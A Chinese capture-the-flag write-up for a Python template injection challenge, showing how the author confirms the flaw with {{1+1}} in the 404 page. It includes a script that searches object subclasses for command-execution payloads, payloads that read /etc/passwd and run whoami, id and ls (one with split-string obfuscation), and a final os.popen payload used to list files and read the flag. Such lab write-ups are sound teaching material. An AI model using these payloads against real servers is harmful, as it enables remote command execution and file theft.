攻防世界-web:Web_python_template_injection
阿新 • • 發佈:2021-11-03
題目描述
暫無
題目截圖
解題思路
題目提示是python模板注入
嘗試訪問不存在路徑,看看404頁面
將不存在路徑進行模板注入測試
構造如下:
http://111.200.241.244:59411/{{1+1}}
可以發現成功執行了1+1的運算結果,存在模板注入點。
直接編寫Python指令碼,探測可執行命令Payload
#coding:utf8 import requests import re import html url = "http://111.200.241.244:59411/{{%s}}" def GetRes(payload): try: t = requests.get(url%(payload)).text reg = '111.200.241.244:59411/(.+?) not found' return [html.unescape(i) for i in re.findall(reg,t)] except: return [] def TestObj(): m = [{"name":'[]',"key":[]},{"name":'()',"key":()},{"name":'""',"key":""},{"name":'\'\'',"key":''},{"name":'{}',"key":{}}] pay = [".__class__.__base__",".__class__.__mro__[1]",".__class__.__mro__[2]"] for i in m: for j in pay: p = GetRes(i["name"]+j+'.__name__') for k in p: if k == 'object': s = GetRes(i["name"]+j+'.__subclasses__()') s = s[0].split(',') for g in range(len(s)): if '\'file\'' in s[g]: print(i["name"]+j+'.__subclasses__()[%s]'%(g)+'(\'/etc/passwd\').read()') q = GetRes(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)) for t in q: if '_Printer' in t: print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].system(\'whoami\')') print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].popen(\'whoami\').read()') if 'Quitter' in t: print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].system(\'whoami\')') print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].popen(\'whoami\').read()') if 'func_globals' in t: print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.func_globals.linecache.os.popen(\'id\').read()') print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.func_globals[\'linecache\'].os.popen(\'whoami\').read()') print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.func_globals[\'linecache\'].__dict__[\'o\'+\'s\'].__dict__[\'sy\'+\'stem\'](\'ls\')') TestObj()
執行結果如下:
隨便找一個Payload進行命令執行,這裡利用下面Payload
[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('whoami').read()
將whoami改成其它命令即可。
列目錄:
發現了flag檔案
讀取flag